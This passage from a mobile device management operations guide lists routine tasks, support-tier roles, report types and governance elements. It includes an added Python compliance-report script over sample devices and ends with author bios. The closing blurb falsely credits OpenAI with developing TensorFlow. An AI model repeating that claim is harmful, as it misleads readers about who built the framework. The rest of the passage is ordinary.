3. User management: Managing and updating user accounts, including creating new
accounts, revoking access, and managing user permissions.
4. Security management: Implementing and monitoring security policies, such as device
encryption, password policies, and access control.
5. Software updates: Installing software updates and patches to ensure that the EMM,
MDM, or MTD solution is up-to-date and secure.
6. Reporting: Generating and reviewing reports to monitor the use of mobile devices,
security threats, and other relevant metrics.
7. Compliance: Ensuring that the EMM, MDM, or MTD solution complies with various
regulations and standards required by the organization.
8. Training: Providing training and support to users and administrators on the use of the
EMM, MDM, or MTD solution.
It is important to establish a routine and regularly perform these activities to ensure that the
EMM, MDM, or MTD solution is functioning properly and providing the necessary protection
and support for mobile devices.
In short, daily EMM, MDM, or MTD solution operation activities are essential to ensuring the
effective protection of mobile devices and the network against malware and other cyber threats.
By performing these tasks regularly, organizations can keep their EMM, MDM, or MTD solution
up-to-date and effectively respond to any potential threats.
4.4.2 Weekly Activities

Weekly EMM, MDM, or MTD operation activities typically include the following tasks:
1. Device inventory management: Updating the inventory of mobile devices, including
adding new devices, retiring old devices, and updating device information.
2. Policy management: Reviewing and updating security policies to ensure that they
remain effective and relevant.
3. Incident management: Reviewing and responding to security incidents, such as
malware infections, lost or stolen devices, or unauthorized access attempts.
4. Compliance reporting: Generating and reviewing reports to ensure that the EMM,
MDM, or MTD solution follows various regulations and standards required by the
organization.
5. User training: Providing training and support to users and administrators on the use of
the EMM, MDM, or MTD solution.
6. System updates: Installing software updates and patches to ensure that the EMM,
MDM, or MTD solution is up-to-date and secure.
7. Performance monitoring: Monitoring the performance of the EMM, MDM, or MTD
solution and identifying any potential issues.
It is important to establish a routine and regularly perform these activities to ensure that the
EMM, MDM, or MTD solution is functioning properly and providing the necessary protection
and support for mobile devices. Additionally, these weekly activities can help identify areas
for improvement and ensure that the EMM, MDM, or MTD solution continues to meet the
evolving needs of the organization.

4.4.3 Monthly Activities

Monthly EMM, MDM, or MTD operation activities typically include the following tasks:
1. Device audit: Auditing the inventory of mobile devices to ensure accuracy and to
identify any discrepancies or missing devices.
2. Security assessment: Conducting a security assessment to identify potential threats
and vulnerabilities, and to assess the effectiveness of existing security policies.
3. Compliance review: Reviewing the compliance status of the EMM, MDM, or MTD
solution with various regulations and standards required by the organization.
4. User feedback: Gathering feedback from users and administrators on the use of the
EMM, MDM, or MTD solution, and incorporating this feedback into future updates and
improvements.
5. System optimization: Optimizing the performance of the EMM, MDM, or MTD
solution, including tuning settings and configurations, and optimizing resource
utilization.
6. Budget review: Reviewing the budget and resources dedicated to the EMM, MDM, or
MTD solution, and making recommendations for future investments.
7. Reporting: Generating and reviewing reports to provide a comprehensive overview of
the status of the EMM, MDM, or MTD solution, including usage statistics, security
incidents, and other relevant metrics.
It is important to establish a routine and regularly perform these monthly activities to ensure
that the EMM, MDM, or MTD solution is functioning properly and providing the necessary
protection and support for mobile devices. Additionally, these monthly activities can help
identify areas for improvement and ensure that the EMM, MDM, or MTD solution continues
to meet the evolving needs of the organization.

4.4.4 What does an L1 EMM, MDM, or MTD Engineer do?

An L1 EMM, MDM, or MTD Engineer is responsible for providing first-level technical support
and resolving simple issues. This may include tasks such as password resets, device enrolment,
and basic troubleshooting. L1 (Level 1) EMM (Enterprise Mobility Management), MDM
(Mobile Device Management), or MTD (Mobile Threat Defense) Engineer activities typically
involve the following:
1. Providing first-level technical support: The L1 engineer is responsible for handling the
initial support requests and troubleshooting issues related to EMM, MDM, or MTD
systems. They should have a good understanding of the system and be able to resolve
basic issues or escalate them to the appropriate level.
2. Monitoring system alerts: The L1 engineer is responsible for monitoring system alerts
and notifications and taking appropriate action when necessary. This can include
investigating system failures or errors, resolving issues related to user access, or
escalating issues to higher levels when necessary.
3. Performing system maintenance: The L1 engineer is responsible for performing
regular maintenance tasks, such as system updates and patches, to ensure that the
EMM, MDM, or MTD system is functioning properly.
4. Documenting and reporting issues: The L1 engineer is responsible for documenting
and reporting any issues or problems related to the EMM, MDM, or MTD system. They
should keep detailed records of support requests, troubleshooting steps, and
resolutions.
5. Providing end-user training: The L1 engineer may be responsible for providing basic
training and support to end-users on how to use the EMM, MDM, or MTD system. This
can include providing guidance on how to access and use applications, or how to
configure devices to meet organizational security requirements.
6. Performing security tasks: The L1 engineer may be responsible for performing basic
security tasks, such as reviewing logs, conducting security scans, or configuring
security policies, to help ensure that the EMM, MDM, or MTD system is secure.
Overall, the L1 EMM, MDM, or MTD engineer plays a critical role in ensuring the smooth
functioning of the system, providing basic support and troubleshooting, and escalating issues
when necessary.

4.4.5 What does an L2 EMM, MDM, or MTD Engineer do?

L2 (Level 2) EMM (Enterprise Mobility Management), MDM (Mobile Device Management), or
MTD (Mobile Threat Defense) Engineer activities involve more advanced technical support
and troubleshooting tasks, such as:
1. Providing technical support: The L2 engineer provides more advanced technical
support, troubleshooting issues that could not be resolved by the L1 engineer. This
may involve more in-depth analysis and investigation of the root cause of the problem.
2. Performing system upgrades and migrations: The L2 engineer may be responsible for
performing system upgrades and migrations, such as moving the EMM, MDM, or MTD
system to a new platform or version.
3. Developing and implementing system integrations: The L2 engineer may be
responsible for developing and implementing system integrations, such as integrating
the EMM, MDM, or MTD system with other systems in the organization.
4. Developing and implementing automation scripts: The L2 engineer may develop and
implement automation scripts to help streamline the management of the EMM, MDM,
or MTD system.
5. Conducting system testing: The L2 engineer may be responsible for conducting system
testing, such as testing new features, patches, or updates to ensure that they function
properly and do not cause issues.
6. Providing training and mentoring: The L2 engineer may be responsible for providing
training and mentoring to L1 engineers, or to end-users who need more advanced
technical training on the EMM, MDM, or MTD system.
Overall, the L2 EMM, MDM, or MTD engineer provides more advanced technical support and
takes on more complex tasks related to the management of the system. They work closely
with L1 engineers and other technical staff to ensure the smooth functioning of the system
and to provide support to end-users as needed.

4.4.6 What does an L3 EMM, MDM, or MTD Engineer do?

L3 (Level 3) EMM (Enterprise Mobility Management), MDM (Mobile Device Management), or
MTD (Mobile Threat Defense) Engineer activities involve highly specialized technical support
and problem-solving tasks, such as:
1. Providing advanced technical support: The L3 engineer provides advanced technical
support, resolving complex technical issues that could not be resolved by L1 or L2
engineers.
2. Conducting root cause analysis: The L3 engineer is responsible for conducting root
cause analysis of complex technical issues, identifying underlying problems and
developing solutions to prevent their recurrence.
3. Designing and implementing system architecture: The L3 engineer may be responsible
for designing and implementing the system architecture, including the hardware,
software, and network infrastructure required to support the EMM, MDM, or MTD
system.
4. Developing and implementing custom solutions: The L3 engineer may be responsible
for developing and implementing custom solutions, such as scripts or plugins, to
address specific technical challenges or business requirements.
5. Evaluating new technologies and solutions: The L3 engineer may be responsible for
evaluating new technologies and solutions, such as new mobile devices or operating
systems, and developing strategies for incorporating them into the EMM, MDM, or
MTD system.
6. Providing training and mentoring: The L3 engineer may be responsible for providing
training and mentoring to L1 and L2 engineers, as well as to other technical staff and
end-users.
Overall, the L3 EMM, MDM, or MTD engineer is a highly specialized technical expert,
responsible for resolving complex technical issues and ensuring the smooth functioning of the
system. They work closely with other technical staff, management, and end-users to provide
support, solve problems, and drive the ongoing development and improvement of the system.

4.4.7 Reports

EMM, MDM, or MTD operation reports typically include the following:
1. Device inventory report: A report that provides an inventory of all mobile devices
enrolled in the EMM, MDM, or MTD solution. This report can include information such
as device type, operating system, and ownership.
2. Security report: A report that provides information about the security status of mobile
devices, including the number of security incidents, the types of incidents, and the
devices affected.
3. Compliance report: A report that provides information about the compliance status of
mobile devices with security policies, regulations, and standards required by the
organization.
4. User report: A report that provides information about the usage of mobile devices,
including the number of devices in use, the number of applications installed, and the
amount of data transmitted.
5. Resource utilization report: A report that provides information about the resource
utilization of the EMM, MDM, or MTD solution, including the amount of storage used,
the number of processors used, and the amount of network bandwidth used.
6. Incident response report: A report that provides information about incidents that have
been reported and the steps taken to resolve them. This report can be used to track
the status of incidents and to ensure that they are being resolved in a timely manner.
In short, EMM, MDM, or MTD operation reports provide valuable insights into the
security of mobile devices and the network, and are essential for understanding the effectiveness
of the EMM, MDM, or MTD solution and for identifying areas for improvement. It is important to
regularly review and analyse these reports to ensure that the EMM, MDM, or MTD solution is
functioning properly and providing the necessary protection and support for mobile devices.
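As an added example (not part of this guide, and not any vendor's product code), the following Python script evaluates a constructed device inventory against the MDM policy items listed in the feature comparison above (business data encryption, device password, VPN, jailbreak/root detection, supported OS) and produces the figures a compliance report and a security report would contain. The device records, the minimum OS versions, the check-in threshold and the violation names are all assumptions made for the example.

```python
"""Added example, not from the original guide: a minimal compliance-report
generator over a constructed MDM device inventory. Policy items follow the
feature comparison (encryption, device password, VPN, jailbreak/root
detection, OS support); thresholds and device records are assumptions."""
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Device:
    device_id: str
    os: str                 # "iOS", "Android", "ChromeOS" (anything else is unsupported)
    os_version: str         # dotted version string, e.g. "17.2"
    encrypted: bool         # business data encryption enforced on the device
    passcode_set: bool      # device password enforced
    vpn_profile: bool       # enterprise VPN profile present
    rooted: bool            # jailbreak/root detected by the agent
    last_checkin_days: int  # days since the device last reported in


# Constructed policy thresholds (an assumption, not a vendor default).
MIN_OS_VERSION = {"iOS": "16", "Android": "13", "ChromeOS": "110"}
MAX_CHECKIN_DAYS = 7


def version_at_least(actual: str, minimum: str) -> bool:
    """Compare dotted versions numerically, padding the shorter one with zeros
    so that "16" and "16.0" are treated as equal."""
    a = [int(p) for p in actual.split(".")]
    m = [int(p) for p in minimum.split(".")]
    width = max(len(a), len(m))
    a += [0] * (width - len(a))
    m += [0] * (width - len(m))
    return a >= m


def evaluate(device: Device) -> List[str]:
    """Return the policy violations for one device; an empty list means compliant."""
    violations = []
    if device.rooted:
        violations.append("jailbroken_or_rooted")
    if not device.encrypted:
        violations.append("not_encrypted")
    if not device.passcode_set:
        violations.append("no_passcode")
    if not device.vpn_profile:
        violations.append("no_vpn_profile")
    minimum = MIN_OS_VERSION.get(device.os)
    if minimum is None:
        violations.append("unsupported_os")
    elif not version_at_least(device.os_version, minimum):
        violations.append("os_out_of_date")
    if device.last_checkin_days > MAX_CHECKIN_DAYS:
        violations.append("stale_checkin")
    return violations


def compliance_report(devices: List[Device]) -> Dict:
    """Aggregate per-device results into the figures a compliance report and a
    security report would show: totals, violation counts, a per-OS breakdown and
    the high-risk (rooted/jailbroken) devices that need immediate follow-up."""
    report = {
        "total": len(devices),
        "compliant": 0,
        "non_compliant": 0,
        "by_violation": {},
        "by_os": {},
        "high_risk_devices": [],
    }
    for device in devices:
        violations = evaluate(device)
        os_entry = report["by_os"].setdefault(device.os, {"total": 0, "compliant": 0})
        os_entry["total"] += 1
        if violations:
            report["non_compliant"] += 1
            for v in violations:
                report["by_violation"][v] = report["by_violation"].get(v, 0) + 1
        else:
            report["compliant"] += 1
            os_entry["compliant"] += 1
        if "jailbroken_or_rooted" in violations:
            report["high_risk_devices"].append(device.device_id)
    return report


# Constructed inventory: six devices with deliberately varied findings.
SAMPLE_DEVICES = [
    Device("D-001", "iOS", "17.2", True, True, True, False, 1),
    Device("D-002", "Android", "12.0", True, True, True, False, 2),
    Device("D-003", "Android", "14.0", True, False, True, True, 0),
    Device("D-004", "iOS", "16.4", False, True, False, False, 12),
    Device("D-005", "ChromeOS", "120.0", True, True, True, False, 3),
    Device("D-006", "Windows", "11", True, True, True, False, 1),
]

if __name__ == "__main__":
    import json
    print(json.dumps(compliance_report(SAMPLE_DEVICES), indent=2))
```

In a real deployment the inventory would come from the EMM/MDM/MTD solution's export or API rather than a hard-coded list, and the violation names would map to the policies configured in that solution.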
4.4.8 Governance of EMM, MDM, or MTD solution

Governance refers to the processes and policies that ensure the effective and efficient
management of an Enterprise Mobility Management (EMM), Mobile Device Management
(MDM), or Mobile Threat Defense (MTD) solution. Effective governance of these solutions is
crucial to ensure that they provide the necessary protection and support for mobile devices,
while also balancing the needs of the organization and its employees. The following are some
key elements of governance for an EMM, MDM, or MTD solution:
1. Policies and procedures: Policies and procedures are the foundation of effective
governance for an EMM, MDM, or MTD solution. They provide guidelines and
standards for how the solution should be used and maintained and help ensure that it
is used in a consistent and effective manner.
2. Security controls: Effective governance of an EMM, MDM, or MTD solution requires
the implementation of robust security controls to protect against threats and prevent
data breaches. These controls can include encryption, access control, and security
monitoring and reporting.
3. Compliance management: Compliance with regulations and standards is an important
aspect of governance for an EMM, MDM, or MTD solution. Organizations must ensure
that their solution is compliant with relevant regulations and standards, such as HIPAA,
PCI DSS, and ISO 27001.
4. User management: Effective governance of an EMM, MDM, or MTD solution requires
the proper management of users and their access to the solution. This includes the
management of user roles, permissions, and authentication.
5. Risk management: Risk management is a crucial component of governance for an
EMM, MDM, or MTD solution. Organizations must assess the risks associated with
their solution and implement controls to mitigate these risks.
6. Incident management: Effective governance of an EMM, MDM, or MTD solution
requires the proper management of incidents, such as security breaches and system
failures. This includes the development of incident response plans and procedures, as
well as the implementation of monitoring and reporting capabilities.
Effective governance of an EMM, MDM, or MTD solution is essential to ensure that it provides
the necessary protection and support for mobile devices while balancing the needs of the
organization and its employees. Regularly reviewing and updating governance policies and
procedures can help ensure that the solution remains effective and efficient over time.

================== END==================



About the authors

As a CISO and Head, Cybersecurity, Sudhansu M Nayak specialises in and spearheads enterprise
cybersecurity (IT/OT), cloud, and data transformation solutions. He advises CxOs and Executive Boards
on cyber risks and techno-operational mitigation, data privacy and protection, and compliance and
governance.
As an avid consultant to multiple think-tanks, he contributes to the building of various components of
national cybersecurity policies. His research and views have been cited in the Centre for Land Warfare
Studies (CLAWS), The Cyber Defense Review (Army Cyber Institute, Australia), DQChannels,
TechPanda, and others.
To bridge cybersecurity skill gaps, he mentors corporates, students, and startups. A passionate
speaker, he talks on cybersecurity and its engagement in international policies and digital
transformation. His current research is focussed on the interplay of cybersecurity with global peace,
state espionage, climate change, international trade, and strategic diplomacy.
In his free time, Sudhansu writes on Indian temples, experiments with Indo-continental dishes, and
dabbles in photography.
Twitter: @smnayak
LinkedIn: https://www.linkedin.com/in/sudhansunayak/

OpenAI is an artificial intelligence research organization founded in 2015 by a group of prominent
technology leaders, including Elon Musk, Sam Altman, Greg Brockman, and others. OpenAI's mission
is to develop and promote friendly AI for the betterment of humanity, while also considering and
addressing potential risks and challenges posed by artificial intelligence. OpenAI conducts research in
a variety of fields related to AI, including deep learning, reinforcement learning, natural language
processing, robotics, and more. It also develops and releases software tools and platforms for machine
learning and AI development, including the popular deep learning framework TensorFlow. OpenAI has
made significant contributions to the field of AI, and its work has been widely recognized and awarded.
